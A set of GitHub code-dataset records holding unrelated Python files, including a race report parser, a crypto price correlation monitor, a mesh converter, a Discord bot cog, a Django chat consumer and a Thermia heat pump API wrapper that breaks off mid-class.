pytest.raises(ValueError):\n assert f.result()\n\n\n@pytest.mark.parametrize(\"EXECUTOR\", [\n ProcessPoolExecutor(max_workers=16),\n ThreadPoolExecutor(max_workers=16),\n ThreadedProcessPoolExecutor(max_processes=4, max_threads=4)\n])\ndef test_all_futures_execute_in_parallel_if_possible(EXECUTOR):\n \"\"\"\n If the number of tasks submitted to the executor is lower than the number\n of workers the executor has, all the tasks should run concurrently (given\n the task running time is not too short).\n\n 0....1....2....3....4....5....6....7\n # DO OVERLAP\n A-----------------B\n A----B\n A----B\n A----B\n\n # DON'T OVERLAP\n A-----------------B\n A---B\n A----B\n A----B\n\n \"\"\"\n futures = []\n\n with EXECUTOR as executor:\n for i in range(16):\n futures.append(executor.submit(_long_running_task))\n\n times = [f.result() for f in futures]\n As, Bs = [t[0] for t in times], [t[1] for t in times]\n\n assert min(Bs) >= max(As)\n","repo_name":"nilp0inter/threadedprocess","sub_path":"test_threadedprocess.py","file_name":"test_threadedprocess.py","file_ext":"py","file_size_in_byte":2339,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"78"} +{"seq_id":"24490359292","text":"import os\nfrom dataclasses import dataclass\nimport datetime\n\nfrom modules.exceptions import *\n\n\ndata_files = {\n \"start\": \"start.log\",\n \"end\": \"end.log\",\n \"abbreviation\": \"abbreviations.txt\"\n}\nerror_log_path = os.path.join(os.path.dirname(__file__), '../ErrorLogs/error_log.txt')\nprint(__file__)\n\n\n@dataclass()\nclass RacerInfo:\n abbreviation: str = None\n racer: str = None\n team: str = None\n start: datetime = None\n finish: datetime = None\n\n @property\n def best_lap_time(self):\n if self.start is None or self.finish is None:\n return None\n return self.finish - self.start\n\n\ndef check_if_files_exists(data_folder_path: str) -> bool:\n assert type(data_folder_path) == str\n for filename in 
data_files.values():\n if not os.path.isfile(os.path.join(data_folder_path, filename)):\n raise FileDoesNotExistError(f\"File {filename} is not found\")\n return True\n\n\ndef make_path_to_files(data_folder_path: str) -> list:\n assert type(data_folder_path) == str\n if check_if_files_exists(data_folder_path):\n start_file_path = os.path.join(data_folder_path, data_files[\"start\"])\n end_file_path = os.path.join(data_folder_path, data_files[\"end\"])\n abbreviation_file_path = os.path.join(data_folder_path, data_files[\"abbreviation\"])\n path_list = [start_file_path, end_file_path, abbreviation_file_path]\n for path in path_list:\n if not os.path.exists(path):\n raise FileDoesNotExistError(f\"{path} does not exist\")\n assert type(path_list) == list\n return path_list\n raise FileNotFoundError(\"No such file or directory\")\n\n\ndef get_racer_abbreviation(raw_abbr_string: str):\n assert type(raw_abbr_string) == str\n abbr = raw_abbr_string[:3]\n if not abbr.isalpha():\n raise AbbreviationStringFormatError\n return abbr\n\n\ndef get_datetime(raw_string: str) -> datetime.datetime:\n assert type(raw_string) == str\n try:\n datetime_obj = datetime.datetime.strptime(raw_string[3:].strip(), '%Y-%m-%d_%H:%M:%S.%f')\n except ValueError:\n raise ParseDateError\n assert type(datetime_obj) == datetime.datetime\n return datetime_obj\n\n\ndef create_log_with_abbr_team_name(abbreviation_data_path: str):\n assert type(abbreviation_data_path) == str\n\n log = {}\n try:\n with open(abbreviation_data_path) as f:\n content = f.readlines()\n for line in content:\n line = line.strip()\n try:\n abbreviation, name, team = line.split(\"_\")\n except ValueError:\n raise StringFormatError\n log[abbreviation] = RacerInfo(abbreviation=abbreviation, racer=name, team=team)\n except FileNotFoundError:\n raise FileDoesNotExistError(f\"Filepath is incorrect: {abbreviation_data_path}\")\n assert type(log) == dict\n return log\n\n\ndef add_timestamp(path: str, log: dict):\n assert type(path) == str\n assert type(log) == dict\n\n log_to_add_timestamp = log\n\n try:\n with open(path) as f:\n content = f.readlines()\n for line in content:\n for key in log_to_add_timestamp.keys():\n if line.startswith(key):\n if 'start' in path:\n log_to_add_timestamp[key].start = get_datetime(line)\n elif 'end' in path:\n log_to_add_timestamp[key].finish = get_datetime(line)\n else:\n raise WrongDataFileError\n except FileNotFoundError:\n raise FileDoesNotExistError(f\"Filepath is incorrect: {path}\")\n assert type(log_to_add_timestamp)\n return log_to_add_timestamp\n\n\ndef make_log(data_folder_path: str) -> dict:\n assert type(data_folder_path) == str\n\n path_list = make_path_to_files(data_folder_path)\n\n for path in path_list:\n assert type(path) == str\n\n try:\n start_data_path, finish_data_path, abbreviation_data_path = path_list\n log = create_log_with_abbr_team_name(abbreviation_data_path)\n log = add_timestamp(start_data_path, log)\n log = add_timestamp(finish_data_path, log)\n except FileNotFoundError:\n raise WrongFilePathError\n\n assert type(log) == dict\n return log\n\n\ndef make_error_log_string(racer_log: RacerInfo) -> str:\n assert type(racer_log) == RacerInfo\n assert racer_log.racer is not None\n assert racer_log.start is not None\n assert racer_log.finish is not None\n\n error_str = f\"{racer_log.racer} race time is incorrect — finish {racer_log.finish} before start {racer_log.start}\\n\"\n assert type(error_str) == str\n return error_str\n\n\ndef make_error_log_file(log_dict: dict):\n assert type(log_dict) == dict\n 
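# A negative day count on best_lap_time means the finish timestamp\n # precedes the start timestamp; those records go to the error log.\n 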
with open(error_log_path, 'w') as f:\n for key in log_dict.keys():\n if log_dict[key].best_lap_time.days < 0:\n f.write(make_error_log_string(log_dict[key]))\n\n\ndef print_error_log(error_path: str):\n assert type(error_path) == str\n if os.path.exists(error_path):\n print(\"------------------------------------------------------------------------\")\n with open(error_path) as f:\n content = f.readlines()\n for line in content:\n print(line.strip())\n else:\n raise FileDoesNotExistError(\"Error log file does not exist\")\n\n\ndef delete_log_notes_with_error(log: dict) -> dict:\n assert type(log) == dict\n key_list = list(log.keys())\n for key in key_list:\n if log[key].best_lap_time.days < 0:\n del log[key]\n assert type(log) == dict\n return log\n\n\ndef make_one_racer_info(name: str, log: list) -> str:\n assert type(name) == str\n assert type(log) == list\n\n for racer, team, race_time in log:\n if racer == name:\n info_str = f\"{racer:30}| {team:35}| {race_time:11}\"\n assert type(info_str) == str\n return info_str\n try:\n with open(error_log_path) as f:\n for line in f:\n if name in line:\n info_str = line.strip()\n return info_str\n except FileNotFoundError:\n raise FileDoesNotExistError(\"Error log file does not exist\")\n raise WrongDriverName(\"This driver did not participate in the race\")\n\n\ndef format_report(log: dict) -> list:\n assert type(log) == dict\n formatted_report = []\n for val in log.values():\n formatted_report.append([val.racer, val.team, str(val.best_lap_time)[:-3]])\n print(formatted_report)\n assert type(formatted_report) == list\n return formatted_report\n\n\ndef sorted_log(formatted_report: list, order: str) -> list:\n assert type(formatted_report) == list\n assert order in (\"asc\", \"desc\")\n sorted_report = sorted(formatted_report, key=lambda x: x[2], reverse=False)\n\n race_log_list = []\n counter = 1\n for racer, team, race_time in sorted_report:\n one_racer_result = f'{counter:3}. 
{racer:30}| {team:35}| {race_time:11}'\n race_log_list.append(one_racer_result)\n counter += 1\n if len(race_log_list) > 15:\n race_log_list.insert(15, \"------------------------------------------------------------------------\")\n if order == 'desc':\n race_log_list.reverse()\n assert type(race_log_list) == list\n return race_log_list\n\n\ndef build_report(data_folder_path: str, order=\"asc\", driver=None):\n assert type(data_folder_path) == str\n assert type(order) == str\n assert order in (\"asc\", \"desc\")\n assert driver is None or type(driver) == str\n assert os.path.exists(data_folder_path)\n\n log = make_log(data_folder_path)\n make_error_log_file(log)\n log = delete_log_notes_with_error(log)\n formatted_log = format_report(log)\n if driver:\n report = make_one_racer_info(driver, formatted_log)\n assert type(report) == str\n else:\n report = sorted_log(formatted_log, order)\n assert type(report) == list\n return report, driver\n\n\ndef print_report(report_data_set: tuple):\n assert type(report_data_set) == tuple\n\n report, driver = report_data_set\n\n if driver:\n print(report)\n else:\n for i in report:\n print(i)\n print_error_log(error_log_path)\n","repo_name":"Seyon7/report","sub_path":"modules/processor.py","file_name":"processor.py","file_ext":"py","file_size_in_byte":8231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"70319461371","text":"import aiohttp\nimport asyncio\n\nfrom config import ETHUSDT_URL, BTCUSDT_URL, INTERVAL_DELAY, RETRY_DELAY\nfrom utils import get_price, calculate_correlation\n\n\nasync def main():\n\n # Initialize the previous prices of both pairs to a high number\n last_eth_price = last_btc_price = 10000\n\n # Initialize empty lists to save the prices of both pairs\n eth_prices = []\n btc_prices = []\n\n while True:\n try:\n async with aiohttp.ClientSession() as session:\n eth_response = await get_price(session, ETHUSDT_URL)\n print(eth_response)\n btc_response = await get_price(session, BTCUSDT_URL)\n print(btc_response)\n\n # Parse the price from the response and append it to the list.\n current_eth_price = float(eth_response['price'])\n eth_prices.append(current_eth_price)\n print(eth_prices)\n\n current_btc_price = float(btc_response['price'])\n btc_prices.append(current_btc_price)\n print(btc_prices)\n\n # If there are more than 60 prices in the list (we have more than 1 hour of data)\n if len(eth_prices) > 60 and len(btc_prices) > 60:\n\n # Calculate the percentage change in price over the last hour\n eth_price_change = (current_eth_price - last_eth_price) / last_eth_price\n btc_price_change = (current_btc_price - last_btc_price) / last_btc_price\n\n # Calculate the correlation between the two sets of prices\n correlation = calculate_correlation(eth_prices, btc_prices)\n print(correlation)\n\n # the ETH price change by the correlation with the BTC price change.\n no_btc_eth_change = eth_price_change - correlation * btc_price_change\n print(no_btc_eth_change)\n\n # if the total price change is more than 1%, print a message.\n if no_btc_eth_change > 0.01:\n print(\n f\"The price of ETHUSDT has increased by 1% in the last hour. Current price:: {current_eth_price}\")\n elif no_btc_eth_change < -0.01:\n print(\n f\"The price of ETHUSDT has decreased by 1% in the last hour. 
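sorted_log() orders rows by the formatted time string, which stays correct only while every value keeps the same digit layout (string order breaks once hours reach two digits). A hedged sketch of a numeric sort key; the row data here is invented:

import datetime

def as_timedelta(race_time: str) -> datetime.timedelta:
    # Parse "H:MM:SS.mmm" back into a timedelta so the sort is numeric,
    # not lexicographic.
    hours, minutes, rest = race_time.split(":")
    seconds, millis = rest.split(".")
    return datetime.timedelta(hours=int(hours), minutes=int(minutes),
                              seconds=int(seconds), milliseconds=int(millis))

rows = [["Racer A", "Team A", "0:01:04.415"], ["Racer B", "Team B", "0:00:58.917"]]
rows.sort(key=lambda row: as_timedelta(row[2]))
assert rows[0][0] == "Racer B"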
Current price: {current_eth_price}\")\n\n last_eth_price = current_eth_price\n last_btc_price = current_btc_price\n\n await asyncio.sleep(INTERVAL_DELAY)\n\n except Exception as e:\n print(f\"A '{e}' error has occurred\")\n await asyncio.sleep(RETRY_DELAY)\n\n\nif __name__ == \"__main__\":\n asyncio.run(main())\n","repo_name":"Shved15/SP-Shcherbin-test-task","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"21057857360","text":"import trimesh\nimport glob\nimport slam.io as sio\n\n\"\"\"\n © Aix Marseille University - LIS-CNRS UMR 7020\n Author(s): Karim Makki, Amine Bohi (karim.makki,amine.bohi{@univ-amu.fr})\n This software is governed by the CeCILL-B license under French law and\n abiding by the rules of distribution of free software. You can use,\n modify and/ or redistribute the software under the terms of the CeCILL-B\n license as circulated by CEA, CNRS and INRIA at the following URL\n \"http://www.cecill.info\".\n As a counterpart to the access to the source code and rights to copy,\n modify and redistribute granted by the license, users are provided only\n with a limited warranty and the software's author, the holder of the\n economic rights, and the successive licensors have only limited\n liability.\n In this respect, the user's attention is drawn to the risks associated\n with loading, using, modifying and/or developing or reproducing the\n software by the user in light of its specific status of free software,\n that may mean that it is complicated to manipulate, and that also\n therefore means that it is reserved for developers and experienced\n professionals having in-depth computer knowledge. 
Users are therefore\n encouraged to load and test the software's suitability as regards their\n requirements in conditions enabling the security of their systems and/or\n data to be ensured and, more generally, to use and operate it in the\n same conditions as regards security.\n The fact that you are presently reading this means that you have had\n knowledge of the CeCILL-B license and that you accept its terms.\n\"\"\"\n\n\n#--------------------------------------------------------------------\n# quadrilateral to triangular mesh Converter\n#\n\n\nresult_path = '../Data/MESH_DATA/trimesh_gifti_all/'\npath = '../Data/MESH_DATA/mesh_gifti_all/TV_Dyn3D_5SL/'\nbasename = 'output_TV_Dyn3D_5SL_3dRecbyReg'\nmesh_set = glob.glob(path+basename+'*.gii')\nmesh_set.sort()\n\nprint(len(mesh_set))\n\nfor t in range(0,len(mesh_set)):\n\n print(t)\n\n prefix = mesh_set[t].split('/')[-1].split('.')[0]\n\n print(prefix)\n\n gifti_file = result_path+prefix+'.gii'\n\n print(gifti_file)\n mesh = sio.load_mesh(mesh_set[t])\n #mesh = trimesh.load_mesh(mesh_set[t])\n sio.write_mesh(mesh, gifti_file)\n\n","repo_name":"k16makki/dynPelvis","sub_path":"Dynpelvis3D/4D_Quad_Mesh_Reconstruction/quad2tri.py","file_name":"quad2tri.py","file_ext":"py","file_size_in_byte":2298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"33123599427","text":"import discord\nimport json\n\nfrom discord.ext import commands\nfrom discord.ext.commands import has_permissions\n\n# ------------------------ COGS ------------------------ # \n\nclass RemovePreviousRewardsCog(commands.Cog, name=\"removePreviousRewards command\"):\n def __init__(self, bot):\n self.bot = bot\n\n# ------------------------------------------------------ # \n\n @commands.command(name = 'removepreviousrewards', aliases = [\"rpr\", \"settings\"])\n @has_permissions(administrator = True)\n async def rolerewards (self, ctx, trueOrFalse):\n\n # Read json file\n with open(\"configuration.json\", \"r\") as configFile:\n data = json.load(configFile)\n \n trueOrFalse = trueOrFalse.lower()\n if trueOrFalse == \"false\":\n data[\"removePreviousRewards\"] = False\n elif trueOrFalse == \"true\":\n data[\"removePreviousRewards\"] = True \n else:\n embed = discord.Embed(title=f\"**ERROR**\", description=f\"The removePreviousRewards setting must be true or false\\nFollow the example : ``{self.bot.command_prefix}removePreviousRewards ``\", color=0xe00000) # Red\n embed.set_footer(text=\"Bot Created by Darkempire#8245\")\n return await ctx.channel.send(embed=embed)\n\n # Write in the json file\n newdata = json.dumps(data, indent=4, ensure_ascii=False)\n with open(\"configuration.json\", \"w\") as configFile:\n configFile.write(newdata)\n\n embed = discord.Embed(title=f\"**SETTINGS :**\", description=f\"RemovePreviousRewards setting has been modified.\", color=0x1eb823) # Green\n embed.set_footer(text=\"Bot Created by Darkempire#8245\")\n await ctx.channel.send(embed=embed)\n\n# ------------------------ BOT ------------------------ # \n\ndef setup(bot):\n bot.add_cog(RemovePreviousRewardsCog(bot))","repo_name":"Darkempire78/Mee6-Bypasser","sub_path":"Cogs/removePreviousRewards.py","file_name":"removePreviousRewards.py","file_ext":"py","file_size_in_byte":1848,"program_lang":"python","lang":"en","doc_type":"code","stars":71,"dataset":"github-code","pt":"78"} +{"seq_id":"74959205692","text":"import os\nimport json\nimport django\n\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"config.settings\")\ndjango.setup()\nfrom 
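The removePreviousRewards cog above follows a plain read-modify-write cycle on its settings file. The pattern condensed, assuming configuration.json exists next to the script; note that nothing here guards against concurrent writers, so a busy bot would be safer with a lock or an atomic rename:

import json

# Read the current settings, flip one flag, write everything back.
with open("configuration.json", "r") as f:
    settings = json.load(f)

settings["removePreviousRewards"] = not settings.get("removePreviousRewards", False)

with open("configuration.json", "w") as f:
    f.write(json.dumps(settings, indent=4, ensure_ascii=False))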
asgiref.sync import async_to_sync\nfrom channels.generic.websocket import WebsocketConsumer, AsyncWebsocketConsumer\nfrom .serializers import Messageserializer\nfrom .models import Message, Chat\nfrom rest_framework.renderers import JSONRenderer\nfrom django.contrib.auth import get_user_model\n\nuser = get_user_model()\n\n\nclass ChatConsumer(WebsocketConsumer):\n\n def new_message(self, data):\n print('new_message')\n message = data['message']\n author = data.get(\"username\", None)\n room_name = data.get('room_name', None)\n self.notif(data)\n chat_model = Chat.objects.get(room_name=room_name)\n print('author', author)\n user_model = user.objects.filter(username=author).last()\n print('user_model', user_model)\n message_model = Message.objects.create(author=user_model, content=message, related_chat=chat_model)\n print(message_model)\n result = eval(self.message_serializer(message_model))\n self.send_to_chat_message(result)\n\n def notif(self, data):\n print(\"start notif\")\n message_room_name = data['room_name']\n chat_room_qs = Chat.objects.filter(room_name=message_room_name)\n members_list = []\n for _ in chat_room_qs[0].members.all():\n members_list.append(_.username)\n\n async_to_sync(self.channel_layer.group_send)(\n 'chat_listener',\n {\n 'type': 'chat_message',\n 'content': data['message'],\n '__str__': data['username'],\n 'room_name': message_room_name,\n 'members_list': members_list,\n }\n )\n\n\n\n def fetch_message(self, data):\n print('fetch_message')\n room_name = data['room_name']\n print('room_name', room_name)\n qs = Message.last_message(self, room_name)\n message_json = self.message_serializer(qs)\n content = {\n \"message\": eval(message_json),\n \"command\": \"fetch_message\",\n }\n\n self.chat_message(content)\n\n def image(self, data):\n self.send_to_chat_message(data)\n\n def message_serializer(self, qs):\n serialized = Messageserializer(qs,\n many=(lambda qs: True if (qs.__class__.__name__ == 'QuerySet') else False)(qs))\n content = JSONRenderer().render(serialized.data)\n return content\n\n def connect(self):\n self.room_name = self.scope['url_route']['kwargs']['room_name']\n self.room_group_name = f\"chat_{self.room_name}\"\n\n async_to_sync(self.channel_layer.group_add)(self.room_group_name, self.channel_name)\n\n self.accept()\n\n commands = {\n \"new_message\": new_message,\n \"fetch_message\": fetch_message,\n \"img\": image,\n }\n\n def disconnect(self, close_code):\n async_to_sync(self.channel_layer.group_discard)(self.room_group_name, self.channel_name)\n\n def receive(self, text_data=None, bytes_data=None):\n text_data_dict = json.loads(text_data)\n # print(\"text_data_dict\", text_data_dict)\n\n command = text_data_dict['command']\n self.commands[command](self, text_data_dict)\n\n def send_to_chat_message(self, message):\n command = message.get(\"command\", None)\n async_to_sync(self.channel_layer.group_send)(\n self.room_group_name,\n {\n 'type': 'chat_message',\n 'content': message['content'],\n 'command': (lambda command: \"img\" if (command == \"img\") else \"new_message\")(command),\n '__str__': message['__str__']\n }\n )\n\n def chat_message(self, event):\n print(event)\n self.send(text_data=json.dumps(event))\n\n# Synchronous Consumer:\n\n# class ChatConsumer(WebsocketConsumer):\n#\n# def connect(self):\n# self.room_name = self.scope['url_route']['kwargs']['room_name']\n# self.room_group_name = f\"chat_{self.room_name}\"\n#\n# async_to_sync(self.channel_layer.group_add)(self.room_group_name, self.channel_name)\n#\n# self.accept()\n#\n# def 
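ChatConsumer.receive() routes each incoming payload through a class-level dict of handlers rather than an if/elif chain. A framework-free sketch of that dispatch pattern (the handler bodies are placeholders, not the consumer's real logic):

class Dispatcher:
    def new_message(self, data):
        return f"new: {data['message']}"

    def fetch_message(self, data):
        return "fetched"

    # Names defined earlier in the class body are visible here.
    commands = {"new_message": new_message, "fetch_message": fetch_message}

    def receive(self, payload: dict):
        # An unknown command raises KeyError; .get() with a default
        # handler would fail more gracefully.
        return self.commands[payload["command"]](self, payload)

assert Dispatcher().receive({"command": "new_message", "message": "hi"}) == "new: hi"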
disconnect(self, close_code):\n# async_to_sync(self.channel_layer.group_discard)(self.room_group_name, self.channel_name)\n#\n# def receive(self, text_data=None, bytes_data=None):\n# text_data_dict = json.loads(text_data)\n# message = text_data_dict['message']\n#\n# async_to_sync(self.channel_layer.group_send)(\n# self.room_group_name,\n# {\n# 'type': 'chat_message',\n# 'message': message,\n# }\n# )\n#\n# def chat_message(self, event):\n# message = event['message']\n# self.send(text_data=json.dumps({\n# 'message': message\n# }))\n\n\n# ASynchronous Consumer:\n# class ChatConsumer(AsyncWebsocketConsumer):\n#\n# async def connect(self):\n# self.room_name = self.scope['url_route']['kwargs']['room_name']\n# self.room_group_name = f\"chat_{self.room_name}\"\n#\n# await self.channel_layer.group_add(self.room_group_name, self.channel_name)\n#\n# await self.accept()\n#\n# async def disconnect(self, close_code):\n# await self.channel_layer.group_discard(self.room_group_name, self.channel_name)\n#\n# async def receive(self, text_data=None, bytes_data=None):\n# text_data_dict = json.loads(text_data)\n# message = text_data_dict['message']\n#\n# await self.channel_layer.group_send(\n# self.room_group_name,\n# {\n# 'type': 'chat_message',\n# 'message': message,\n# }\n# )\n#\n# async def chat_message(self, event):\n# message = event['message']\n# await self.send(text_data=json.dumps({\n# 'message': message\n# }))\n","repo_name":"MehdiShad/MiniChat","sub_path":"chat/consumers.py","file_name":"consumers.py","file_ext":"py","file_size_in_byte":5923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"18812735002","text":"from datetime import datetime\nimport json\nimport logging\nimport sys\nfrom ..utils.utils import pretty_print_except\n\nfrom typing import TYPE_CHECKING\n\nfrom ThermiaOnlineAPI.const import (\n OPERATIONAL_TIME_REGISTERS,\n REG_BRINE_IN,\n REG_BRINE_OUT,\n REG_ACTUAL_POOL_TEMP,\n REG_COOL_SENSOR_SUPPLY,\n REG_COOL_SENSOR_TANK,\n REG_DESIRED_SUPPLY_LINE,\n REG_DESIRED_SUPPLY_LINE_TEMP,\n REG_DESIRED_SYS_SUPPLY_LINE_TEMP,\n REG_OPER_DATA_RETURN,\n REG_OPER_DATA_SUPPLY_MA_SA,\n REG_OPER_TIME_COMPRESSOR,\n REG_OPER_TIME_HOT_WATER,\n REG_OPER_TIME_IMM1,\n REG_OPER_TIME_IMM2,\n REG_OPER_TIME_IMM3,\n REG_RETURN_LINE,\n REG_SUPPLY_LINE,\n TEMPERATURE_REGISTERS,\n DATETIME_FORMAT,\n)\n\nfrom ..utils.utils import get_dict_value_safe\n\nif TYPE_CHECKING:\n from ..api.ThermiaAPI import ThermiaAPI\n\nDEFAULT_REGISTER_INDEXES = {\n \"temperature\": None,\n \"operation_mode\": None,\n \"hot_water_switch\": None,\n}\n\n\nclass ThermiaHeatPump:\n def __init__(self, device_data: json, api_interface: \"ThermiaAPI\"):\n self.__device_id = str(device_data[\"id\"])\n self.__api_interface = api_interface\n\n self._LOGGER = logging.getLogger(__name__ + \".\" + self.__device_id)\n\n self.__info = None\n self.__status = None\n self.__device_data = None\n\n # GROUPS\n self.__group_temperatures = None\n self.__group_operational_status = None\n self.__group_operational_time = None\n self.__group_operational_operation = None\n self.__group_hot_water = None\n\n self.__alarms = None\n self.__historical_data_registers_map = None\n\n self.__register_indexes = DEFAULT_REGISTER_INDEXES\n\n self.update_data()\n\n def update_data(self):\n self.__info = self.__api_interface.get_device_info(self.__device_id)\n self.__status = self.__api_interface.get_device_status(\n self.__device_id)\n self.__device_data = self.__api_interface.get_device_by_id(\n self.__device_id)\n\n 
self.__register_indexes[\"temperature\"] = self.__status.get(\n \"heatingEffectRegisters\", [None, None]\n )[1]\n\n self.__group_temperatures = self.__api_interface.get__group_temperatures(\n self.__device_id\n )\n self.__group_operational_status = (\n self.__api_interface.get__group_operational_status(\n self.__device_id)\n )\n self.__group_operational_time = (\n self.__api_interface.get__group_operational_time(self.__device_id)\n )\n self.__group_operational_operation = (\n self.__api_interface.get_group_operational_operation(self)\n )\n self.__group_hot_water = self.__api_interface.get_group_hot_water(self)\n\n self.__alarms = self.__api_interface.get_all_alarms(self.__device_id)\n\n def get_register_indexes(self):\n return self.__register_indexes\n\n def set_register_index_operation_mode(self, register_index: int):\n self.__register_indexes[\"operation_mode\"] = register_index\n\n def set_register_index_hot_water_switch(self, register_index: int):\n self.__register_indexes[\"hot_water_switch\"] = register_index\n\n def set_temperature(self, temperature: int):\n self._LOGGER.info(\"Setting temperature to \" + str(temperature))\n self.__status[\n \"heatingEffect\"\n ] = temperature # update local state before refetching data\n self.__api_interface.set_temperature(self, temperature)\n self.update_data()\n\n def set_operation_mode(self, mode: str):\n self._LOGGER.info(\"Setting operation mode to \" + str(mode))\n\n self.__group_operational_operation[\n \"current\"\n ] = mode # update local state before refetching data\n self.__api_interface.set_operation_mode(self, mode)\n self.update_data()\n\n def set_hot_water_switch_state(self, state: int):\n self._LOGGER.info(\"Setting hot water switch to \" + str(state))\n\n if self.__group_hot_water is None:\n self._LOGGER.error(\"Hot water switch not available\")\n return\n\n self.__group_hot_water = state # update local state before refetching data\n self.__api_interface.set_hot_water_switch_state(self, state)\n self.update_data()\n\n def __get_heat_temperature_data(self):\n device_temperature_register_index = self.get_register_indexes()[\n \"temperature\"]\n if device_temperature_register_index is None:\n return None\n\n if self.__group_temperatures is None:\n return None\n\n data = [\n d\n for d in self.__group_temperatures\n if d[\"registerIndex\"] == device_temperature_register_index\n ]\n\n if len(data) != 1:\n # Temperature status not supported\n return None\n\n data = data[0]\n\n return {\n \"minValue\": data[\"minValue\"],\n \"maxValue\": data[\"maxValue\"],\n \"step\": data[\"step\"],\n }\n\n def __get_temperature_data_by_register_name(\n self, register_name: TEMPERATURE_REGISTERS\n ):\n return self.__get_data_from_group_by_register_name(\n self.__group_temperatures, register_name\n )\n\n def __get_operational_time_data_by_register_name(\n self, register_name: OPERATIONAL_TIME_REGISTERS\n ):\n return self.__get_data_from_group_by_register_name(\n self.__group_operational_time, register_name\n )\n\n def __get_data_from_group_by_register_name(self, group, register_name: str):\n if group is None:\n return None\n\n data = [d for d in group if d[\"registerName\"] == register_name]\n\n if len(data) != 1:\n # Temperature status not supported\n return None\n\n data = data[0]\n\n return {\n \"minValue\": data[\"minValue\"],\n \"maxValue\": data[\"maxValue\"],\n \"step\": data[\"step\"],\n \"value\": data[\"registerValue\"],\n }\n\n def __get_active_alarms(self):\n active_alarms = filter(\n lambda alarm: alarm.get(\n \"isActiveAlarm\", False) is 
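__get_heat_temperature_data() keeps a register only when exactly one list entry matches the device's register index, treating zero or multiple matches as "not supported". The same check on invented data:

entries = [
    {"registerIndex": 1, "minValue": 10, "maxValue": 30, "step": 1},
    {"registerIndex": 2, "minValue": 15, "maxValue": 25, "step": 1},
]
wanted = 2
matches = [e for e in entries if e["registerIndex"] == wanted]
# Exactly one match is required; anything else means the feature is absent.
data = matches[0] if len(matches) == 1 else None
assert data is not None and data["minValue"] == 15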
True, self.__alarms\n )\n return list(active_alarms)\n\n def __set_historical_data_registers(self):\n data = self.__api_interface.get_historical_data_registers(\n self.__device_id)\n\n data_map = {}\n\n if data is not None and data.get(\"registers\") is not None:\n registers = data[\"registers\"]\n\n for register in registers:\n data_map[register[\"registerName\"]] = register[\"registerId\"]\n\n self.__historical_data_registers_map = data_map\n\n @property\n def name(self):\n return self.__info.get(\"name\")\n\n @property\n def id(self):\n return self.__device_id\n\n @property\n def is_online(self):\n return self.__info.get(\"isOnline\")\n\n @property\n def last_online(self):\n return self.__info.get(\"lastOnline\")\n\n @property\n def model(self):\n return self.__device_data.get(\"profile\", {}).get(\"thermiaName\")\n\n @property\n def has_indoor_temp_sensor(self):\n return self.__status.get(\"hasIndoorTempSensor\")\n\n @property\n def indoor_temperature(self):\n if self.has_indoor_temp_sensor:\n return self.__status.get(\"indoorTemperature\")\n else:\n return self.heat_temperature\n\n @property\n def is_outdoor_temp_sensor_functioning(self):\n return self.__status.get(\"isOutdoorTempSensorFunctioning\")\n\n @property\n def outdoor_temperature(self):\n return self.__status.get(\"outdoorTemperature\")\n\n @property\n def is_hot_water_active(self):\n return self.__status.get(\"isHotwaterActive\") or self.__status.get(\n \"isHotWaterActive\"\n )\n\n @property\n def hot_water_temperature(self):\n return self.__status.get(\"hotWaterTemperature\")\n\n ###########################################################################\n # Heat temperature data\n ###########################################################################\n\n @property\n def heat_temperature(self):\n return self.__status.get(\"heatingEffect\")\n\n @property\n def heat_min_temperature_value(self):\n return get_dict_value_safe(self.__get_heat_temperature_data(), \"minValue\")\n\n @property\n def heat_max_temperature_value(self):\n return get_dict_value_safe(self.__get_heat_temperature_data(), \"maxValue\")\n\n @property\n def heat_temperature_step(self):\n return get_dict_value_safe(self.__get_heat_temperature_data(), \"step\")\n\n ###########################################################################\n # Other temperature data\n ###########################################################################\n\n @property\n def supply_line_temperature(self):\n return get_dict_value_safe(\n self.__get_temperature_data_by_register_name(\n REG_SUPPLY_LINE), \"value\"\n ) or get_dict_value_safe(\n self.__get_temperature_data_by_register_name(\n REG_OPER_DATA_SUPPLY_MA_SA),\n \"value\",\n )\n\n @property\n def desired_supply_line_temperature(self):\n return (\n get_dict_value_safe(\n self.__get_temperature_data_by_register_name(\n REG_DESIRED_SUPPLY_LINE),\n \"value\",\n )\n or get_dict_value_safe(\n self.__get_temperature_data_by_register_name(\n REG_DESIRED_SUPPLY_LINE_TEMP\n ),\n \"value\",\n )\n or get_dict_value_safe(\n self.__get_temperature_data_by_register_name(\n REG_DESIRED_SYS_SUPPLY_LINE_TEMP\n ),\n \"value\",\n )\n )\n\n @property\n def return_line_temperature(self):\n return get_dict_value_safe(\n self.__get_temperature_data_by_register_name(\n REG_RETURN_LINE), \"value\"\n ) or get_dict_value_safe(\n self.__get_temperature_data_by_register_name(\n REG_OPER_DATA_RETURN), \"value\"\n )\n\n @property\n def brine_out_temperature(self):\n return get_dict_value_safe(\n self.__get_temperature_data_by_register_name(\n 
REG_BRINE_OUT), \"value\"\n )\n\n @property\n def pool_temperature(self):\n return get_dict_value_safe(\n self.__get_temperature_data_by_register_name(\n REG_ACTUAL_POOL_TEMP), \"value\"\n )\n \n @property\n def brine_in_temperature(self):\n return get_dict_value_safe(\n self.__get_temperature_data_by_register_name(REG_BRINE_IN), \"value\"\n )\n\n @property\n def cooling_tank_temperature(self):\n return get_dict_value_safe(\n self.__get_temperature_data_by_register_name(\n REG_COOL_SENSOR_TANK), \"value\"\n )\n\n @property\n def cooling_supply_line_temperature(self):\n return get_dict_value_safe(\n self.__get_temperature_data_by_register_name(\n REG_COOL_SENSOR_SUPPLY),\n \"value\",\n )\n\n ###########################################################################\n # Operational status data\n ###########################################################################\n\n @property\n def operational_status(self):\n return get_dict_value_safe(self.__group_operational_status, \"current\")\n\n @property\n def available_operational_statuses(self):\n return list(\n get_dict_value_safe(\n self.__group_operational_status, \"available\", {}\n ).values()\n )\n\n @property\n def available_operational_statuses_map(self):\n return get_dict_value_safe(self.__group_operational_status, \"available\", {})\n\n ###########################################################################\n # Operational time data\n 